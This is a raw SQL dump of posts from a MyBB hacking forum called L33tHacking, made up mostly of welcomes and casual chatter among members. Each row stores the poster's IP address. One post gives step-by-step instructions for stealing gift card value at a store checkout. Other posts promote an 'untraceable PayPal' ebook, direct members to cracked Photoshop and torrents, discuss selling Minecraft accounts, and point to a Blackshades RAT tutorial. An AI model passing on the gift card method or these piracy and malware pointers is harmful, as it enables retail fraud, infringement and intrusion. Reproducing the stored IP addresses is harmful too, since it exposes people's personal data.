1st) ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c0b87418d1752741cadf60261a5fa600', '0', '0'); INSERT INTO mybb_posts VALUES('6856', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1351769795', 'Just L33tHacking? Or do you want it to say\n\n\'L33tHacking\'\n\'Triple H\'\n\nOr something?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9edbb25e8014d4b1bd95c7adad63b78f', '0', '0'); INSERT INTO mybb_posts VALUES('6857', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351769826', 'Congratulations on 100 posts. I reached 1400 posts today!', '24.212.197.164', '416597412', '1', '0', '82', '1351769836', '1', '6c1f9ee7eda51f712cfa7f61f6ed57df', '0', '1351769836'); INSERT INTO mybb_posts VALUES('6858', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '82', 'iTzIpod', '1351769881', 'Welcome back to L33tHacking.\nHope you don\'t perform those actions like you did earlier.. \nt3h jok3r and I will be keeping an eye on you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dcdabf9434e0aed27e755844fd630f38', '0', '0'); INSERT INTO mybb_posts VALUES('6859', '1168', '6828', '73', 'RE: Temple Run or Subway Surfer?', '0', '82', 'iTzIpod', '1351769920', 'I love Temple Run. :p\nReally fun and addictive.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee8ac9544084aefa2d4139e2aa77b3f6', '0', '0'); INSERT INTO mybb_posts VALUES('6860', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '205', 'mothered', '1351771980', 'I don\'t believe we\'ve met, so welcome back mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '3ba28a964cc890997dba04fcbb14333c', '0', '0'); INSERT INTO mybb_posts VALUES('6861', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '205', 'mothered', '1351772073', 'I haven\'t watched It, so It\'ll be Interesting to see what It contains.\r\n\r\nCheers mate, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1536eb23750a3c065dbdf3eecad7c746', '0', '0'); INSERT INTO mybb_posts VALUES('6862', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '228', 'VirtualLegend', '1351774397', 'Great Method thanks for the share can you put some proof of your earnings', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e42f83892308f618579f5624c3db6b37', '0', '0'); INSERT INTO mybb_posts VALUES('6863', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '228', 'VirtualLegend', '1351776556', '@t3h Jok3r\nF*king nice theme we need also a theme like this', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1e25e10156257abff75b3efef8586fe3', '0', '0'); INSERT INTO mybb_posts VALUES('6864', '595', '6838', '65', 'RE: What movie did you watch recently?', '0', '228', 'VirtualLegend', '1351779130', '[quote=\'Triple H\' pid=\'6838\' dateline=\'1351750350\']\r\nI just got down watching tokyo drift and i watched fast five too today\r\n[/quote]\r\n\r\nAwesome movies i watched them last weekend the hole series', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd8220f9d953aa1d3abefb01f88bcb49c', '0', '0'); INSERT INTO mybb_posts VALUES('6865', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '53', 'sirchamp', '1351779987', 'I tried this. It works but it\'s really slow. I made like 6 hits in 2hours. It isnt worth it.', '144.37.250.215', '-1876559145', '1', '0', '0', '0', '1', 'eb1154a055e0f91bf681ebac020bd909', '0', '0'); INSERT INTO mybb_posts VALUES('6866', '1174', '0', '47', '?? Untraceable PayPal + Never Get Limited Again + PP Secret ??', '0', '228', 'VirtualLegend', '1351791040', '[color=#32CD32][size=xx-large]Another Giveaway from Me Yeaaah :P[/size][/color]\r\n\r\n[color=#FFD700][size=large]Having a 100% anonymous (or close to it) PayPal account, and none of your activities being traceable. Sounds impossible?\r\nThis E-book will make it possible for you...\r\n\r\nI\'m giving away a few Ebooks that are very handy to use. Like as the title says It\'s all about Paypal.[/size][/color]\r\n\r\n[color=#32CD32][size=medium][u][b]Information:[/b][/u][/size][/color]\r\n[color=#FFFFFF][size=medium]Amount of Ebooks: 2\r\nTotal Pages: 23 Pages\r\nVirusTotal: [url=https://www.virustotal.com/file/5a5ca277141e0075768c4af5137d07bf7d378471ee99072ea274c8697e816246/analysis/1351017118/]Click Here For The Scan Results[/url][/color]\r\n[color=#FFFFFF][size=medium]Download Link:[/size][/color] [url=http://adfoc.us/9383011646354][size=medium]Click Here To Download[/size][/url][/size]\r\n\r\n[align=center][color=#FFD700][size=x-large]HAVE FUN AND A QUICK THANK YOU IS ALWAYS APPRECIATED :D[/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '96a8bf4652dc66b3b16a72536f4cf77a', '0', '0'); INSERT INTO mybb_posts VALUES('6867', '1155', '6855', '3', 'RE: Happy Halloween', '0', '1', 't3h jok3r', '1351791724', '[quote=\'iTzIpod\' pid=\'6855\' dateline=\'1351769736\']\r\nDidn\'t go trick or treating this year.\r\nI should go today! (November 1st) ;)\r\n[/quote]\r\n\r\nLol good luck in that. You should go in Mcdonalds drive thru lol', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c8c315998e9bb8970f16bfc2f7f14146', '0', '0'); INSERT INTO mybb_posts VALUES('6868', '1165', '6858', '7', 'RE: I m Back on LH:)', '0', '1', 't3h jok3r', '1351792168', '[quote=\'iTzIpod\' pid=\'6858\' dateline=\'1351769881\']\r\nWelcome back to L33tHacking.\r\nHope you don\'t perform those actions like you did earlier.. \r\nt3h jok3r and I will be keeping an eye on you.\r\n[/quote]\r\n\r\nNow that\'s what you call a true bro. A tru bro knows what\'s his brow is doing :)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9cee1884ad2563e4a4a46a49c0cc3712', '0', '0'); INSERT INTO mybb_posts VALUES('6869', '1175', '0', '4', 'Me:3', '0', '265', 'Ryan', '1351792445', 'Ohaider guys im Ryan :)\r\nVirtualLegend Brought me here:)', '78.143.155.3', '1318034179', '0', '0', '0', '0', '1', '5b0a8effece9c9319e737e794d5c5d9b', '0', '0'); INSERT INTO mybb_posts VALUES('6870', '1176', '0', '47', 'Free .asia domain', '0', '84', 'Thunder™', '1351792454', 'I didn\'t see this posted but \r\n\r\nhttp://adfoc.us/8446110728703\r\n\r\nis having a LIMITED time offer. one .asia domain free. you don\'t need any credit card on file. just go there and make it. feel free to use it for any needs.\r\n\r\nyou get the domain for one year free. enjoy guys and get it before it expires.', '111.91.75.189', '1868254141', '0', '0', '0', '0', '1', 'a3afeb4c1b695b41ac6e44d1b886536c', '0', '0'); INSERT INTO mybb_posts VALUES('6871', '1175', '6869', '4', 'RE: Me:3', '0', '228', 'VirtualLegend', '1351792592', 'Welcome to LH wish you a good stay', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '51309aed3bf0b56b194ec8bf8c28b234', '0', '0'); INSERT INTO mybb_posts VALUES('6872', '1175', '6869', '4', 'RE: Me:3', '0', '1', 't3h jok3r', '1351792821', 'Welcome to L33T Hacking Ryan. Thanks for joining and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22866dac7ba47bd6b401f18f2966bdc3', '0', '0'); INSERT INTO mybb_posts VALUES('6873', '1176', '6870', '47', 'RE: Free .asia domain', '0', '228', 'VirtualLegend', '1351792835', 'Nice Share, Hope you will stay active \n\nI brought you specially back bro :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7315d1253148af4a70de339aadf946b2', '0', '0'); INSERT INTO mybb_posts VALUES('6874', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '222', 'Exposé', '1351794172', 'what was your site Sin? And welcome back!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '85a7b0a08416f73c8afec0d7e04698a2', '0', '0'); INSERT INTO mybb_posts VALUES('6875', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '82', 'iTzIpod', '1351798558', 'His site was elitelobby.com or something. I forgot. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eefacfa19627ff5c67ed21bcd88c919e', '0', '0'); INSERT INTO mybb_posts VALUES('6876', '1175', '6869', '4', 'RE: Me:3', '0', '82', 'iTzIpod', '1351798618', 'Welcome to LH dude!\nThanks VL for referring him.\nEnjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b1aa58d933a2ad9ea9f30391eef4403c', '0', '0'); INSERT INTO mybb_posts VALUES('6877', '1175', '6869', '4', 'RE: Me:3', '0', '257', 'XxTREYZxX', '1351798790', 'Welcome mate enjoy your stay,be active and HQ', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '2a6c49ae0731db8e6ee70f4b77033519', '0', '0'); INSERT INTO mybb_posts VALUES('6878', '1155', '6738', '3', 'RE: Happy Halloween', '0', '257', 'XxTREYZxX', '1351798966', '/Request close thread,As if hollow is finished :L', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '17f2ad219bc8fe8d68c092dfdb0f16cd', '0', '0'); INSERT INTO mybb_posts VALUES('6879', '1158', '6852', '74', 'RE: A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351799137', '[quote=\'iTzIpod\' pid=\'6852\' dateline=\'1351769606\']\r\nCapital I..\r\nEtc. :/\r\nCommas. \r\n._.\r\n[/quote]\r\n\r\nSorry i missed those one\'s.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'eff34c24733171d6e0c8bed68aa0f425', '0', '0'); INSERT INTO mybb_posts VALUES('6880', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351799351', 'That\'s not to bad.\nHave you earn\'t much selling these accounts.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '6b77758b109cef0f71f10dd5a25118ce', '0', '0'); INSERT INTO mybb_posts VALUES('6881', '1174', '6866', '47', 'RE: ?? Untraceable PayPal + Never Get Limited Again + PP Secret ??', '0', '257', 'XxTREYZxX', '1351799504', 'Thank You very much VL,Very much appreciated', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '53ce3e6c4564a23d4edd61c43c02c2da', '0', '0'); INSERT INTO mybb_posts VALUES('6882', '861', '6842', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1351799692', '[quote=\'Triple H\' pid=\'6842\' dateline=\'1351750798\']\r\nI reached 100 posts finally :D\r\n[/quote]\r\n\r\nGreat Work Mate You Should get your cheers on 100 Award.\n[hr]\n[quote=\'iTzIpod\' pid=\'6857\' dateline=\'1351769826\']\r\nCongratulations on 100 posts. I reached 1400 posts today!\r\n[/quote]\r\n\r\nGreat Work Ipod, Your doing great :O', '203.104.11.13', '-882373875', '1', '0', '257', '1351799856', '1', '4bef540430aa4d7dea550f43a649e2ea', '0', '0'); INSERT INTO mybb_posts VALUES('6883', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '257', 'XxTREYZxX', '1351800181', 'This is Awesome,\nI now have a sic as BG', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'e7257e7f53da4f97e019173b9a322219', '0', '0'); INSERT INTO mybb_posts VALUES('6884', '1155', '6738', '3', 'RE: Happy Halloween', '0', '82', 'iTzIpod', '1351802435', 'Agreed with Trey.\n\n/Request Close Thread\nSince Halloween is finished.\nHappy November 1st.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e61d807b114bf489b4e8f20c554031d7', '0', '0'); INSERT INTO mybb_posts VALUES('6885', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '228', 'VirtualLegend', '1351802458', 'Just browse one at piratebay', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '36be4ad95c90b8806dfe5659fcdbad3a', '0', '0'); INSERT INTO mybb_posts VALUES('6886', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '82', 'iTzIpod', '1351802487', 'The fuck is \'one\'s\'?\n+ didn\'t I just state capital I? And you just said \'i\' -.-\n\nI\'m going to kill you one day..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b72e4320fcc522059949345b2ec56f01', '0', '0'); INSERT INTO mybb_posts VALUES('6887', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '228', 'VirtualLegend', '1351802528', 'lol it isn\'t that great don\'t you think', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '733c16efb40ffae8663d2e5198f8f88e', '0', '0'); INSERT INTO mybb_posts VALUES('6888', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351802580', 'K. You need to Google \'How to write with proper grammar\'\n-.-\nI didn\'t understand a word you just said.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a100e7fe1f3f27922a76833d6a2c6d23', '0', '0'); INSERT INTO mybb_posts VALUES('6889', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351802615', 'Thanks Trey.\nAnd \'you\'re\' not \'your\'.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b87e6de94bcd9c8005fb7834f2ce8ef', '0', '0'); INSERT INTO mybb_posts VALUES('6890', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1351802655', 'You\'re welcome! :) Glad to help.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1360cb3d74e1253933248717a87637d0', '0', '0'); INSERT INTO mybb_posts VALUES('6891', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '62', 'R?????zo?', '1351807202', 'I remember you, welcome back.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cc2e1f569f77faf4681ba09c173d5c5e', '0', '0'); INSERT INTO mybb_posts VALUES('6892', '1175', '6869', '4', 'RE: Me:3', '0', '62', 'R?????zo?', '1351807246', 'welcome, enjoy your stay and be active', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '32db6763f87b94255aade9953dd2618d', '0', '0'); INSERT INTO mybb_posts VALUES('6893', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '61', 'NXK', '1351808701', 'Welcome back, Haven\'t seen you in awhile. Hope you\'re still going to be HQ.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f5a3faa53da5e6b5c9a6ecfcacd2d9bf', '0', '0'); INSERT INTO mybb_posts VALUES('6894', '1154', '6734', '43', 'RE: Iphone 5 serials', '0', '61', 'NXK', '1351808927', 'Oh damn, This is nice aha! Great share.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '1959ae94930dd078a67db9462c230762', '0', '0'); INSERT INTO mybb_posts VALUES('6896', '1155', '6738', '3', 'RE: Happy Halloween', '0', '1', 't3h jok3r', '1351823062', 'Thread Closed!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b8f112d3b4ca1db87ede014411581d7', '0', '0'); INSERT INTO mybb_posts VALUES('6897', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '1', 't3h jok3r', '1351823114', 'About to watch the perfect storm movie from 2000.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '36bf573964a091788a7118f5662eac63', '0', '0'); INSERT INTO mybb_posts VALUES('6898', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '2', 'Apathy', '1351823829', 'Welcome back. Did your site not work out?', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'f586cbb587a7b744f7e9316f95e3ba6f', '0', '0'); INSERT INTO mybb_posts VALUES('6899', '1176', '6870', '47', 'RE: Free .asia domain', '0', '2', 'Apathy', '1351823873', 'Already seen this but nice share anyway. Thanks.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '5bcedb8d9347c8481244e5e0fbab27f1', '0', '0'); INSERT INTO mybb_posts VALUES('6900', '1175', '6869', '4', 'RE: Me:3', '0', '2', 'Apathy', '1351823926', 'Hey, thanks for checking out our forum. Have a nice stay and be active.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'e219bd7b8fd89c1b198cc410a4af8be0', '0', '0'); INSERT INTO mybb_posts VALUES('6901', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '2', 'Apathy', '1351824006', 'Does not look too hard to make But I like it. Thanks.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'a8eff06297620c6fbd4e7992ea8e0806', '0', '0'); INSERT INTO mybb_posts VALUES('6902', '1176', '6870', '47', 'RE: Free .asia domain', '0', '205', 'mothered', '1351828725', 'I shall check this out after this post.\r\n\r\nThanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'df654255f440635b314bcfabb96c09c4', '0', '0'); INSERT INTO mybb_posts VALUES('6903', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '205', 'mothered', '1351828953', 'In terms of navigating your way around, Windows 8 Is much of a muchness to Windows 7.\r\n\r\nYou\'ll get used to It, In no time at all.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5450ce36fbeabf3ff2bca9f45b81fbe8', '0', '0'); INSERT INTO mybb_posts VALUES('6904', '305', '6863', '84', 'RE: Themejunkies.net theme rip', '0', '1', 't3h jok3r', '1351833099', '[quote=\'VirtualLegend\' pid=\'6863\' dateline=\'1351776556\']\r\n@t3h Jok3r\r\nF*king nice theme we need also a theme like this\r\n[/quote]\r\nD@rthforums.net, forumleague and 1 more site use the same kind of theme.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', 'eff34692bf6c792ed1f5d66f2c5cb00f', '0', '0'); INSERT INTO mybb_posts VALUES('6905', '1177', '0', '43', 'Free itunes/app store gift cards crack', '0', '5', 'Timmy', '1351835023', 'I think im the first one to find this if not then at least not the slowest one to figure out.\n\n[b]Requirements[/b]\n[list]\n[*] A app store gift card (any amount)\n[*] Paper & Pen/pencil or phone with notepad or something similar.\n[/list]\n\n[b]Step 1[/b]\nPick up any card and detach the card from the holder.\n\n[b]Step 2[/b]\nScratch the grey thing completely and leave no grey stuff.\n\n[b]Step 3[/b]\nWrite down the code you got after scratching the line\n\n[b]Step 4[/b]\nAttach the card back to the holder and go to any teller.\n\n[b]Step 5[/b]\nAfter she scans it say you forgot your wallet etc and you will be back in a sec. Go away and don\'t come back.\n\n[b]Conclusion [/b]\nUse the code to get some money on your itunes account. That\'s it you now have $$$ on your account for free.\n\n[b]How does this work?[/b]\n\nThere\'s no barcode that they scan on the gift card they type in a code on the card. After they type in it\'s auto active so after they scan it you pay for it and basically after they scan it it\'s active so the hidden code which you need to scratch is active before you pay and after they scan. So you don\'t need to pay for it as it\'s already active and non-used.\n\nJok3r will be verifying this tomorrow by going into a store.', '173.245.64.95', '-1376436129', '1', '0', '5', '1351835042', '1', 'b00bbd5520814b652b5be20b18251497', '0', '1351835042'); INSERT INTO mybb_posts VALUES('6906', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '5', 'Timmy', '1351835198', 'If you find one OP then please PM me.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', 'b91a1aacf334e00b667608e7f515e617', '0', '0'); INSERT INTO mybb_posts VALUES('6907', '1172', '6844', '83', 'RE: [tut]How to knock someone out[/video]', '0', '5', 'Timmy', '1351835242', '[quote=\'XxTREYZxX\' pid=\'6844\' dateline=\'1351751906\']\r\nHow come i cant watch this,it\'s just a white pic :O\r\n[/quote]\r\n\r\nIt works for me. Maybe it\'s just you.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '7e45b587d3685e9a6a6efff85f219885', '0', '0'); INSERT INTO mybb_posts VALUES('6908', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '5', 'Timmy', '1351835432', 'Maybe a customizing your PC section.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '46f9eab8416c3ba77e203c93ea6bd1b4', '0', '0'); INSERT INTO mybb_posts VALUES('6909', '937', '5258', '19', '[Junk]Nude Bot- Mr. Do you want to fap?', '0', '1', 't3h jok3r', '1351835566', 'This thread has been junked.', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('6910', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1351836612', 'Ok @ timmy\n\ni dont want torrent @ virtual', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '89e499c70ef5f35e57ec2e691e7c5366', '0', '0'); INSERT INTO mybb_posts VALUES('6911', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '257', 'XxTREYZxX', '1351846011', 'Have you got any suggestions why?', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '080c1971eb35f17285b3b6c60b2df2c0', '0', '0'); INSERT INTO mybb_posts VALUES('6912', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351846146', 'I trying to say how much have you made selling mc accounts', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '112e98cc4ecf91f6bd8a946b6a1540a9', '0', '0'); INSERT INTO mybb_posts VALUES('6913', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351853146', 'Well, I sold about 7 or 8 so far. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc2044c2a39f4d20de31d6ea77bf81e0', '0', '0'); INSERT INTO mybb_posts VALUES('6914', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351853664', 'So about 24 dollars earn\'t.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'c72c29a26a1ec398f89b4612d1a2db83', '0', '0'); INSERT INTO mybb_posts VALUES('6915', '1178', '0', '35', 'My new Siggy', '0', '257', 'XxTREYZxX', '1351853769', 'Hey guys how many of you guys and ladies like my siggy', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9503a5a75aee69809583e3d33b75b324', '0', '0'); INSERT INTO mybb_posts VALUES('6916', '1178', '6915', '35', 'RE: My new Siggy', '0', '61', 'NXK', '1351857481', 'Wrong section, This belongs in the graphics lounge. Ill move it for you now :).', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '040adf0b054bf1dbdcc025a85b3b2870', '0', '0'); INSERT INTO mybb_posts VALUES('6917', '1178', '6915', '35', 'RE: My new Siggy', '0', '257', 'XxTREYZxX', '1351867559', 'Oh thank you NXK for doing that.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '69a45b3d7863846d4690c924cc68e80a', '0', '0'); INSERT INTO mybb_posts VALUES('6918', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '53', 'sirchamp', '1351869162', 'The Video is banned in my country ...', '114.184.4.171', '1924662443', '1', '0', '0', '0', '1', '273e1e499314648869c61be0f8ba45de', '0', '0'); INSERT INTO mybb_posts VALUES('6919', '1164', '6811', '11', 'RE: RAT Help', '0', '53', 'sirchamp', '1351875738', 'It\'s actually pretty easy... There are lots of tutorials on the web.lmgtfy.com/?q=blackshades+rat+tutorial', '84.131.58.175', '1417886383', '1', '0', '0', '0', '1', '3d6e23615874923df38b447aa442fb9d', '0', '0'); INSERT INTO mybb_posts VALUES('6920', '1179', '0', '4', 'LSD is here', '0', '313', 'LSD', '1351876624', 'Hey my name is LSD, I heard about this forum when I was on LeakForums and then one of my friends on Nodus reminded me of it so I registered. Hopefully this place is cool. Gonna be checking things out. :cool:', '69.125.203.115', '1165871987', '0', '0', '0', '0', '1', '4e20e238226cb907f19a15f701683d5c', '0', '0'); INSERT INTO mybb_posts VALUES('6921', '1179', '6920', '4', 'RE: LSD is here', '0', '257', 'XxTREYZxX', '1351876940', 'hey LCD whats happening,hope you stay active and HQ if you have any problems feel free to pm me or the admin and staff', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '208ecf424f391bba0d49c4beac504b1c', '0', '0'); INSERT INTO mybb_posts VALUES('6922', '1173', '6846', '5', 'RE: Request for LH staff', '0', '61', 'NXK', '1351882367', 'Ill check it out, I don\'t normally use any kind of tool bars since they slow down your browser, But ill give it a try.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '991c29709af7fe5fb69394fb0efc8d22', '0', '0'); INSERT INTO mybb_posts VALUES('6923', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '61', 'NXK', '1351882432', 'I guess.. this is a good guide if you need to fight someone hahah.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '00d0b637c0eb8a7735bbd02a3ffce12d', '0', '0'); INSERT INTO mybb_posts VALUES('6924', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '82', 'iTzIpod', '1351884147', 'Quite nice. :P\nSmart way to get your own code.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '321f4c5f9f3ea29881426042fb80fb74', '0', '0'); INSERT INTO mybb_posts VALUES('6925', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351884211', 'What the fuck is earn\'t? -.-\n\n\nWhy are you making LQ posts?\nDo you seriously care?\nJust take this conversation to a PM or something or talk to be on Skype about it. You don\'t have to post because it\'s LQ. Your posts are making LH LQ.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd7779d763d6544586eee78fc95e333c3', '0', '0'); INSERT INTO mybb_posts VALUES('6926', '1178', '6915', '35', 'RE: My new Siggy', '0', '82', 'iTzIpod', '1351884244', 'It\'s too fast that\'s all I have to say.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '85b1d5eb1338e48e3c9e67904de25402', '0', '0'); INSERT INTO mybb_posts VALUES('6927', '1179', '6920', '4', 'RE: LSD is here', '0', '82', 'iTzIpod', '1351884292', 'It\'s LSD not LCD.\nHey LSD, what\'s up?\nWelcome to L33tHacking\nEnjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c6203c754e411fbd037796be86076ec5', '0', '0'); INSERT INTO mybb_posts VALUES('6928', '1179', '6920', '4', 'RE: LSD is here', '0', '61', 'NXK', '1351889833', 'Welcome, I hope you enjoy it here. Try to be active and have fun :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '3489f235720fdd5a581e91dedfc367b9', '0', '0'); INSERT INTO mybb_posts VALUES('6929', '1175', '6869', '4', 'RE: Me:3', '0', '61', 'NXK', '1351889875', 'Welcome, I hope you enjoy it here. Stay HQ and follow the rules and everything should be fine mate :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'cbfd811cb77fa1583899ea7a289cb067', '0', '0'); INSERT INTO mybb_posts VALUES('6930', '1166', '6824', '46', 'RE: [Guide] Reporting Phishing Pages', '0', '53', 'sirchamp', '1351890232', '[quote]l33thacking.net then the phished URL would be l33thacking.net [/quote]\nI dont see any difference there.', '2.201.36.40', '46736424', '1', '0', '0', '0', '1', 'd7372c9594cade411b6853e78529af20', '0', '0'); INSERT INTO mybb_posts VALUES('6931', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '228', 'VirtualLegend', '1351891839', 'I Section only for Money making; with the catogory\'s; CPA, PPD PPC etc. \n\nMaybe a Good idea ?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'd9a8a7879a5201ad926fedea42fb310e', '0', '0'); INSERT INTO mybb_posts VALUES('6932', '1175', '6876', '4', 'RE: Me:3', '0', '228', 'VirtualLegend', '1351891893', '[quote=\'iTzIpod\' pid=\'6876\' dateline=\'1351798618\']\r\nWelcome to LH dude!\r\nThanks VL for referring him.\r\nEnjoy your stay!\r\n[/quote]\r\n\r\nNo problem bro Just want to help the forum', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '88ff9a2ab948043762e8f963a94474d6', '0', '0'); INSERT INTO mybb_posts VALUES('6933', '1171', '6910', '33', 'RE: Anyone have photoshop cracked?', '0', '228', 'VirtualLegend', '1351891989', '[quote=\'Triple H\' pid=\'6910\' dateline=\'1351836612\']\r\nOk @ timmy\r\n\r\ni dont want torrent @ virtual\r\n[/quote]\r\n\r\nThan it\'s hard to find one, because it\'s a big file', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'c38c2fa0c7447ee97b0a8cf79476dec3', '0', '0'); INSERT INTO mybb_posts VALUES('6934', '1178', '6915', '35', 'RE: My new Siggy', '0', '228', 'VirtualLegend', '1351892089', 'Nah too large and it maybe looks better in the center', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '124af5044877e0cea1c2624c36aa5836', '0', '0'); INSERT INTO mybb_posts VALUES('6935', '1178', '6915', '35', 'RE: My new Siggy', '0', '257', 'XxTREYZxX', '1351892282', 'Personally i like it the way it is so yeah thanks for the opinions.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '610562eb4c952d9186d7389a358e4dea', '0', '0'); INSERT INTO mybb_posts VALUES('6936', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '62', 'R?????zo?', '1351892683', 'Looks legit, will give it a try I think :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '51b9328a96c9062c2e1377ab148e3cfb', '0', '0'); INSERT INTO mybb_posts VALUES('6937', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1351894204', 'Will you accept Photoshop CS3/CS4 Portable? :p Because I can give you the portable version of those.\n(It\'s exactly the same as Photoshop CS3/CS4 just that it\'s a \'portable version\' (Allowing you to put it on a USB or so) + it takes up less space than the original. :)\nIf you want it, just post below and I\'ll give you the DL link.\n\n\nIf you want Photoshop CS6, I don\'t have the portable version. Nor do I know how to get it.\nBut, I know how to get the cracked Photoshop CS6 version though (Full)\nJust download the trial version and then replace the 